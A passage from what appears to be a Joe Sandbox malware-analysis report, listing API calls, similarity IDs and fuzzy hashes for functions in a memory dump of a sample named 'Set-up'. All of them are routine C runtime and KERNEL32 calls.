                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _lock$CriticalEnterHandleIncrementInterlockedModuleSection_unlock
                                                                                              • String ID: KERNEL32.DLL
                                                                                              • API String ID: 2973837600-2576044830
                                                                                              • Opcode ID: a2333e82f890a2209dcd0939ce883e5cdd0b26ce11e86b0d669418b630bf2bcb
                                                                                              • Instruction ID: 8882b848e82a322dcf04eb7a0067a65e7c88eab16ea55cf413676a8243307b92
                                                                                              • Opcode Fuzzy Hash: a2333e82f890a2209dcd0939ce883e5cdd0b26ce11e86b0d669418b630bf2bcb
                                                                                              • Instruction Fuzzy Hash: 36016D71405B80DEE7209F75C84674DBBF0BF413A5F10494ED4DA972A0EBB8AE40CB65
                                                                                              APIs
                                                                                              • QueryDepthSList.KERNEL32(?,?,?,?,?,?,6BB969F3,?,?), ref: 6BB9717E
                                                                                              • InterlockedPushEntrySList.KERNEL32(?,?,?,?,?,?,6BB969F3,?,?), ref: 6BB97193
                                                                                              • QueryDepthSList.KERNEL32(?,?,?,?,?,6BB969F3,?,?), ref: 6BB9719A
                                                                                              • InterlockedFlushSList.KERNEL32(?,?,?,?,?,6BB969F3,?,?), ref: 6BB971C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: List$DepthInterlockedQuery$EntryFlushPush
                                                                                              • String ID:
                                                                                              • API String ID: 4063097673-0
                                                                                              • Opcode ID: 08966bef877b80835c40795176e7cbc2dc94fe655475285ddf866755327398f7
                                                                                              • Instruction ID: 71b82e41ebbfa1989b689c74a8c7b4105807be8ef507f5ee4a7552439c7e2bdc
                                                                                              • Opcode Fuzzy Hash: 08966bef877b80835c40795176e7cbc2dc94fe655475285ddf866755327398f7
                                                                                              • Instruction Fuzzy Hash: 41319C76500565AFCB00EF29D9809AA73E4FF4B32472545AAE816DB700DB78FD41CBE0
                                                                                              APIs
                                                                                              • QueryDepthSList.KERNEL32(80000000,-00000001,00000000,?,?,?,6BB994CF,00000000,?,00000000,6BB9F8EF,00000000,00000000,00000000,00000000,00000000), ref: 6BBA3EF6
                                                                                              • InterlockedPushEntrySList.KERNEL32(80000008,-000000C8,?,6BB994CF,00000000,?,00000000,6BB9F8EF,00000000,00000000,00000000,00000000,00000000,?,?,6BB9682D), ref: 6BBA3F0D
                                                                                              • QueryDepthSList.KERNEL32(80000008,?,6BB994CF,00000000,?,00000000,6BB9F8EF,00000000,00000000,00000000,00000000,00000000,?,?,6BB9682D,?), ref: 6BBA3F14
                                                                                              • InterlockedFlushSList.KERNEL32(80000008,?,6BB994CF,00000000,?,00000000,6BB9F8EF,00000000,00000000,00000000,00000000,00000000,?,?,6BB9682D,?), ref: 6BBA3F43
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: List$DepthInterlockedQuery$EntryFlushPush
                                                                                              • String ID:
                                                                                              • API String ID: 4063097673-0
                                                                                              • Opcode ID: 3dfd938ca33544d5ad0d84400069d617c20b6c59ee2ccf57456c1c8491e8d60d
                                                                                              • Instruction ID: cffe00ffe99ed43c9d215e424ea9566452e35efa2a40d967fad815aaded54f01
                                                                                              • Opcode Fuzzy Hash: 3dfd938ca33544d5ad0d84400069d617c20b6c59ee2ccf57456c1c8491e8d60d
                                                                                              • Instruction Fuzzy Hash: 6131D276A14565AFCB10CF28C9809AAB3F8FF4A320B158559E816CB700D739F941CFE0
                                                                                              APIs
                                                                                              • _lock.MSVCR100(00000001,6BB6C6A0,00000010,6BB6C872,6BB6C8B0,0000000C), ref: 6BB6C66B
                                                                                                • Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E
                                                                                              • _malloc_crt.MSVCR100(00000038,6BB6C6A0,00000010,6BB6C872,6BB6C8B0,0000000C), ref: 6BB88F66
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,6BB6C6A0,00000010,6BB6C872,6BB6C8B0,0000000C), ref: 6BB88F8E
                                                                                              • free.MSVCR100(01332288), ref: 6BB88FA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$CountEnterInitializeSpin_lock_malloc_crtfree
                                                                                              • String ID:
                                                                                              • API String ID: 954917037-0
                                                                                              • Opcode ID: 00816b152f2fe2ce1cb4892808e7e7ae67be07e2ff9453a0423a20b246c5b217
                                                                                              • Instruction ID: eea778f9fff3ff5b3f5c1fd952beb637306933fd50074ea85b2071bc2d5545af
                                                                                              • Opcode Fuzzy Hash: 00816b152f2fe2ce1cb4892808e7e7ae67be07e2ff9453a0423a20b246c5b217
                                                                                              • Instruction Fuzzy Hash: F931CD71A042819FDB10CFA9C4C1A1EBBF0FF2A360B51415EE1559B290EB79ED419F44
                                                                                              APIs
                                                                                              • ?wait_for_multiple@event@Concurrency@@SAIPAPAV12@I_NI@Z.MSVCR100(00000000,00000001,00000001,00000000,ECA782CA,?,6BB95C86), ref: 6BB975FB
                                                                                              • ?_SpinOnce@?$_SpinWait@$0A@@details@Concurrency@@QAE_NXZ.MSVCR100 ref: 6BB97622
                                                                                              • ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR100(6BB95CC6), ref: 6BB97663
                                                                                              • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100(?,?,?,?,?,?,?,?,6BB95CC6), ref: 6BB97692
                                                                                              • ?Block@Context@Concurrency@@SAXXZ.MSVCR100(?,?,?,?,?,?,?,?,6BB95CC6), ref: 6BB976B6
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$Spin$??0scoped_lock@critical_section@?unlock@critical_section@?wait_for_multiple@event@A@@details@Block@Context@Once@?$_V12@V12@@Wait@$0
                                                                                              • String ID:
                                                                                              • API String ID: 358966004-0
                                                                                              • Opcode ID: d9a8345214f68d461e2cac7a027da7e30bbe1983dc3fd9018b47dbba03319a8e
                                                                                              • Instruction ID: 00446ce2422dd4b14b35216f8c8e65a6fc6428f4f10a2137c5f0bbfa17b436df
                                                                                              • Opcode Fuzzy Hash: d9a8345214f68d461e2cac7a027da7e30bbe1983dc3fd9018b47dbba03319a8e
                                                                                              • Instruction Fuzzy Hash: E5318B715483819FD710EF29E481B4AB7E4FB87764F100A3EF4A586290E7B9D548CBA2
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: Name::operator+
                                                                                              • String ID:
                                                                                              • API String ID: 2943138195-0
                                                                                              • Opcode ID: 4fbd2542969918843cf57cb0e4617998dcd867c2c17a199d56718f2e71db114b
                                                                                              • Instruction ID: 84a6afd5746d3580f43cc95753dde0d4d49e71c808c91a8ab1595b5a05e6a3fa
                                                                                              • Opcode Fuzzy Hash: 4fbd2542969918843cf57cb0e4617998dcd867c2c17a199d56718f2e71db114b
                                                                                              • Instruction Fuzzy Hash: FC31E172A402889FC710CF6CD8819EABBF9EF49744B40446EE5D6CB340E778AD41CB50
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BB9778C
                                                                                              • ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR100(?,00000024,6BBA54DA,00000000,6BBA55E7,00000000,?,00000001,?,00000000,6BBA5EC0,?,?,?,00000000), ref: 6BB9779F
                                                                                                • Part of subcall function 6BB9B030: __EH_prolog3.LIBCMT ref: 6BB9B037
                                                                                              • malloc.MSVCR100(00000001,?,00000024,6BBA54DA,00000000,6BBA55E7,00000000,?,00000001,?,00000000,6BBA5EC0,?,?,?,00000000), ref: 6BB977E8
                                                                                              • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100(?,00000024,6BBA54DA,00000000,6BBA55E7,00000000,?,00000001,?,00000000,6BBA5EC0,?,?,?,00000000), ref: 6BB9783A
                                                                                              • _freea_s.MSVCR100(00000000,?,00000024,6BBA54DA,00000000,6BBA55E7,00000000,?,00000001,?,00000000,6BBA5EC0,?,?,?,00000000), ref: 6BB97853
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$??0scoped_lock@critical_section@?unlock@critical_section@H_prolog3H_prolog3_V12@@_freea_smalloc
                                                                                              • String ID:
                                                                                              • API String ID: 911861471-0
                                                                                              • Opcode ID: 38bd23a89b7adf31a18b87cc886eb2a2c501600a58b251147a20aaca010b1755
                                                                                              • Instruction ID: eaa3f9677139a12f0b163d2ac9ee2dae868ae30d69a1290699c58957265b95f7
                                                                                              • Opcode Fuzzy Hash: 38bd23a89b7adf31a18b87cc886eb2a2c501600a58b251147a20aaca010b1755
                                                                                              • Instruction Fuzzy Hash: 5B21A071E002918FDB05EFAAE8D1A5EB7F5FF46750B1040B9D955DB250DBBC9801CB90
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,6BC06CD0,00000104,?,?,?,?,?,?,6BB87432), ref: 6BBABFFA
                                                                                              • _parse_cmdline.LIBCMT ref: 6BBAC025
                                                                                              • _malloc_crt.MSVCR100(?,?,?,?,?,?,?,6BB87432), ref: 6BBAC048
                                                                                              • _parse_cmdline.LIBCMT ref: 6BBAC061
                                                                                              • __cwild.LIBCMT ref: 6BBAC077
                                                                                              Similarity
                                                                                              • API ID: _parse_cmdline$FileModuleName__cwild_malloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 953782237-0
                                                                                              • Opcode ID: 832e4a1475bfe490aea00c44c259271035c65253daa804e90637ea2ec35b43a3
                                                                                              • Instruction ID: a77c1dd8eaadabd43ce408ad0fe9c9f3ffcacc60f1205542b7d0f4de168b2d8f
                                                                                              • Opcode Fuzzy Hash: 832e4a1475bfe490aea00c44c259271035c65253daa804e90637ea2ec35b43a3
                                                                                              • Instruction Fuzzy Hash: 0111D672A08254AFDB24CB78CC40A9E7BF8DB4A774F11066AE611E71C0EB75DA0087A4
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BBA2FBF
                                                                                              • EnterCriticalSection.KERNEL32(?,00000028,6BB9F124,00000000,?,00000000,?,6BB9CACE,?,00000000,00000000,?,?), ref: 6BBA2FCB
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?), ref: 6BBA2FF0
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6BBA304D
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?), ref: 6BBA305B
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterH_prolog3Leave
                                                                                              • String ID:
                                                                                              • API String ID: 4250467438-0
                                                                                              • Opcode ID: f73a7c96be08116baa69d3f4c8054e21a7175f5e7ec878ef0858a1b888388ef2
                                                                                              • Instruction ID: 845aa51dc135d7caf4c500fc526e22c14a4dffe80c1f5dbe72e31e8e29978e98
                                                                                              • Opcode Fuzzy Hash: f73a7c96be08116baa69d3f4c8054e21a7175f5e7ec878ef0858a1b888388ef2
                                                                                              • Instruction Fuzzy Hash: F7216071E08286AFDB38DF79C495B6EBBB5FF45340B1484A9E111EB160EB39D940CB21
                                                                                              APIs
                                                                                              • _localtime64_s.MSVCR100(?,?), ref: 6BB77600
                                                                                              • asctime_s.MSVCR100(?,00000000,?), ref: 6BB77613
                                                                                              • _errno.MSVCR100 ref: 6BB77628
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6BB89D0A
                                                                                              • _errno.MSVCR100 ref: 6BB89D16
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo_localtime64_sasctime_s
                                                                                              • String ID:
                                                                                              • API String ID: 2556715357-0
                                                                                              • Opcode ID: dc1bbefaad9d6fd37e01dc0bea5bb49cb2c938f624e3e9e14c173556c444b568
                                                                                              • Instruction ID: c7dd86dd7d1b4debdb53cc69cc3bfc62e1ca59ded31ee9ce25798395acb40522
                                                                                              • Opcode Fuzzy Hash: dc1bbefaad9d6fd37e01dc0bea5bb49cb2c938f624e3e9e14c173556c444b568
                                                                                              • Instruction Fuzzy Hash: 72115C31A002999BDF25EF3ADC41BDE73A5DF4A710F50407AE8109B140E77CC900CB94
                                                                                              APIs
                                                                                              • _wcsnicoll_l.MSVCR100(?,?,?,00000000), ref: 6BB6FB02
                                                                                              • _errno.MSVCR100 ref: 6BB8C7BD
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB8C7C8
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo_wcsnicoll_l
                                                                                              • String ID:
                                                                                              • API String ID: 1358483507-0
                                                                                              • Opcode ID: f5980a937237d3a9837fa8ac43a88e4e21217a1dcfeed7bedbc2d3ff54a3f29b
                                                                                              • Instruction ID: e12e846b483ed322a32c31381b1ce47551f53bf669ed932cb026dd2722ebb07e
                                                                                              • Opcode Fuzzy Hash: f5980a937237d3a9837fa8ac43a88e4e21217a1dcfeed7bedbc2d3ff54a3f29b
                                                                                              • Instruction Fuzzy Hash: 381125B55801E5EBDF200E65E8903BD32E5EB117A1F54879AF8648A284DB3DC840CBA1
                                                                                              APIs
                                                                                              • _fileno.MSVCR100(?,?,?,6BB71072,?,6BB710A8,0000000C,6BB710DE,Function_000113F7,?,?,00000000,?), ref: 6BB70DB6
                                                                                              • _isatty.MSVCR100(00000000,?,?,?,6BB71072,?,6BB710A8,0000000C,6BB710DE,Function_000113F7,?,?,00000000,?), ref: 6BB70DBC
                                                                                              • __p__iob.MSVCR100(?,?,6BB71072,?,6BB710A8,0000000C,6BB710DE,Function_000113F7,?,?,00000000,?), ref: 6BB88A2D
                                                                                              • _malloc_crt.MSVCR100(00001000,?,?,?,?,6BB71072,?,6BB710A8,0000000C,6BB710DE,Function_000113F7,?,?,00000000,?), ref: 6BB88A71
                                                                                              Similarity
                                                                                              • API ID: __p__iob_fileno_isatty_malloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 301265415-0
                                                                                              • Opcode ID: b0e33a281db99699bc48fafba5dbe40ce34e3bd83499395ac8616115242dade8
                                                                                              • Instruction ID: 88f238b5d0747deb16f34b1c9235990548e3b8bc6a0acd6655729cda98857a65
                                                                                              • Opcode Fuzzy Hash: b0e33a281db99699bc48fafba5dbe40ce34e3bd83499395ac8616115242dade8
                                                                                              • Instruction Fuzzy Hash: 931173728087829FD3609F79DC91647B7F8EB553A4B10892ED5A6C3640F779E4808B90
                                                                                              APIs
                                                                                              • _errno.MSVCR100(6BB6C8B0,0000000C), ref: 6BB6C8D6
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB6C8B0,0000000C), ref: 6BB894A7
                                                                                                • Part of subcall function 6BB6C656: _lock.MSVCR100(00000001,6BB6C6A0,00000010,6BB6C872,6BB6C8B0,0000000C), ref: 6BB6C66B
                                                                                              • _errno.MSVCR100(6BB6C8B0,0000000C), ref: 6BB894B3
                                                                                              • _errno.MSVCR100(6BB6C8B0,0000000C), ref: 6BB894C0
                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT(6BC03610,?,000000FE,6BB6C8B0,0000000C), ref: 6BB894D6
                                                                                                • Part of subcall function 6BB6C737: __wsopen_s.LIBCMT(?,?,00000000,?,00000180,00000000,?,?), ref: 6BB6C801
                                                                                                • Part of subcall function 6BB6C8CC: _unlock_file.MSVCR100(?,6BB6C8A6), ref: 6BB6C8CF
                                                                                              Similarity
                                                                                              • API ID: _errno$CallFilterFunc@8__wsopen_s_invalid_parameter_noinfo_lock_unlock_file
                                                                                              • String ID:
                                                                                              • API String ID: 773299370-0
                                                                                              APIs
                                                                                              • _calloc_crt.MSVCR100(00000001,00000004,00000000,00000000,0000003D,?,6BB773E6,74DEDF80,00000000,01331910), ref: 6BB773A8
                                                                                              • _wcsdup.MSVCR100(00000000,00000000,00000000,0000003D,?,6BB773E6,74DEDF80,00000000,01331910), ref: 6BB773C5
                                                                                              Similarity
                                                                                              • API ID: _calloc_crt_wcsdup
                                                                                              • String ID:
                                                                                              • API String ID: 1800982338-0
                                                                                              APIs
                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6BB907A6
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 6BB907B2
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BB907BA
                                                                                              • GetTickCount.KERNEL32 ref: 6BB907C2
                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 6BB907CE
                                                                                              Similarity
                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                              • String ID:
                                                                                              • API String ID: 1445889803-0
                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6BBA7835
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000), ref: 6BBA7842
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000,00000000), ref: 6BBA785A
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,00000000,00000000), ref: 6BBA7868
                                                                                              • InitializeSListHead.KERNEL32(00000028,?,?,?,?,?,?,00000000,00000000), ref: 6BBA7887
                                                                                              Similarity
                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventExceptionHeadInitializeLastListThrow
                                                                                              • String ID:
                                                                                              • API String ID: 2464499457-0
                                                                                              APIs
                                                                                              • DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6BB876A1,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BBAC4DA
                                                                                              • free.MSVCR100(00000000,?,?,6BB876A1,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BBAC4DD
                                                                                              • DeleteCriticalSection.KERNEL32(0000000E,?,?,6BB876A1,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BBAC504
                                                                                              • DecodePointer.KERNEL32(00000006,6BB876A1,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BBAC880
                                                                                              • TlsFree.KERNEL32(0000000E,6BB876A1,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BBAC89E
                                                                                              Similarity
                                                                                              • API ID: CriticalDeleteSection$DecodeFreePointerfree
                                                                                              • String ID:
                                                                                              • API String ID: 1464103408-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _errno
                                                                                              • String ID:
                                                                                              • API String ID: 2918714741-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo_wmemsetmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 286551074-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _errno
                                                                                              • String ID:
                                                                                              • API String ID: 2918714741-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo_memsetmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 2314827996-0
                                                                                              APIs
                                                                                              • _get_osfhandle.MSVCR100(00000000,?,?,6BB6D354,?,00000000,00000000), ref: 6BB716BF
                                                                                              • SetFilePointer.KERNEL32(00000000,?,00000000,6BB6D354,00000000,?,?,6BB6D354,?,00000000,00000000), ref: 6BB716D8
                                                                                              • _errno.MSVCR100(?,?,6BB6D354,?,00000000,00000000), ref: 6BB9036B
                                                                                              • GetLastError.KERNEL32(?,6BB6D354,?,00000000,00000000), ref: 6BB9037E
                                                                                              • __dosmaperr.LIBCMT(00000000,?,6BB6D354,?,00000000,00000000), ref: 6BB9038A
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer__dosmaperr_errno_get_osfhandle
                                                                                              • String ID:
                                                                                              • API String ID: 1165083932-0
                                                                                              APIs
                                                                                              • _errno.MSVCR100(?,6BB62D92,?,?,?,00000000,?), ref: 6BB893B8
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,6BB62D92,?,?,?,00000000,?), ref: 6BB893C3
                                                                                              • _errno.MSVCR100(?,?,6BB62D92,?,?,?,00000000,?), ref: 6BB893CD
                                                                                              • _errno.MSVCR100 ref: 6BB893E4
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,6BB62D92,?,?,?,00000000,?), ref: 6BB893EF
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2819658684-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2819658684-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BB9F2BE
                                                                                              • EnterCriticalSection.KERNEL32(6BB9D93F,00000008,6BBA9035), ref: 6BB9F2D0
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000024), ref: 6BB9F2E2
                                                                                                • Part of subcall function 6BB602C1: malloc.MSVCR100(?), ref: 6BB602CC
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000030), ref: 6BB9F307
                                                                                                • Part of subcall function 6BBA7EE6: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6BBA7F10
                                                                                                • Part of subcall function 6BBA7EE6: GetLastError.KERNEL32(?,00000000,00000000), ref: 6BBA7F1D
                                                                                                • Part of subcall function 6BBA7EE6: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000,00000000), ref: 6BBA7F35
                                                                                                • Part of subcall function 6BBA7EE6: _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,00000000,00000000), ref: 6BBA7F43
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6BB9F329
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@CriticalSection$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateEnterErrorEventExceptionH_prolog3LastLeaveThrowmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 921447554-0
                                                                                              APIs
                                                                                              • _lock_file.MSVCR100(?,6BB72F78,0000000C,6BB72FAC,?,000000FF,?,?,?), ref: 6BB72F3E
                                                                                                • Part of subcall function 6BB6A557: _lock.MSVCR100(?,?,?,6BBB6EA0,00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BB6A584
                                                                                              • _fread_nolock_s.MSVCR100(?,?,?,?,?,6BB72F78,0000000C,6BB72FAC,?,000000FF,?,?,?), ref: 6BB72F56
                                                                                                • Part of subcall function 6BB72E42: memcpy_s.MSVCR100(?,?,?,?), ref: 6BB72EEB
                                                                                                • Part of subcall function 6BB72A86: _unlock_file.MSVCR100(6BB72F6D,6BB72F6D), ref: 6BB72A89
                                                                                              • _memset.LIBCMT(?,00000000,000000FF,6BB72F78,0000000C,6BB72FAC,?,000000FF,?,?,?), ref: 6BB88D02
                                                                                              • _errno.MSVCR100(6BB72F78,0000000C,6BB72FAC,?,000000FF,?,?,?), ref: 6BB88D0A
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB72F78,0000000C,6BB72FAC,?,000000FF,?,?,?), ref: 6BB88D15
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_fread_nolock_s_invalid_parameter_noinfo_lock_lock_file_memset_unlock_filememcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 3226975504-0
                                                                                              APIs
                                                                                              • _control87.MSVCR100(00000001,?,00000000,?,6BBACE9B,00000000,00010000,00030000,?,6BB91D56,?,6BB6B983,?,?,6BB6B295,00000000), ref: 6BB6CA7D
                                                                                              • _control87.MSVCR100(00000000,00000000,00000000,?,6BBACE9B,00000000,00010000,00030000,?,6BB91D56,?,6BB6B983,?,?,6BB6B295,00000000), ref: 6BB924BB
                                                                                              • _errno.MSVCR100(00000000,?,6BBACE9B,00000000,00010000,00030000,?,6BB91D56,?,6BB6B983,?,?,6BB6B295,00000000), ref: 6BB924C4
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,?,6BBACE9B,00000000,00010000,00030000,?,6BB91D56,?,6BB6B983,?,?,6BB6B295,00000000), ref: 6BB924CE
                                                                                              • _control87.MSVCR100(00000001,?,00000000,?,6BBACE9B,00000000,00010000,00030000,?,6BB91D56,?,6BB6B983,?,?,6BB6B295,00000000), ref: 6BB924DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _control87$_errno_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 1498936549-0
                                                                                              APIs
                                                                                                • Part of subcall function 6BBAAC51: CreateThread.KERNEL32(00000000,00000000,-00000018,6BBA0ED5,00010000,?), ref: 6BBAAC8D
                                                                                                • Part of subcall function 6BBAAC51: GetLastError.KERNEL32 ref: 6BBAAC97
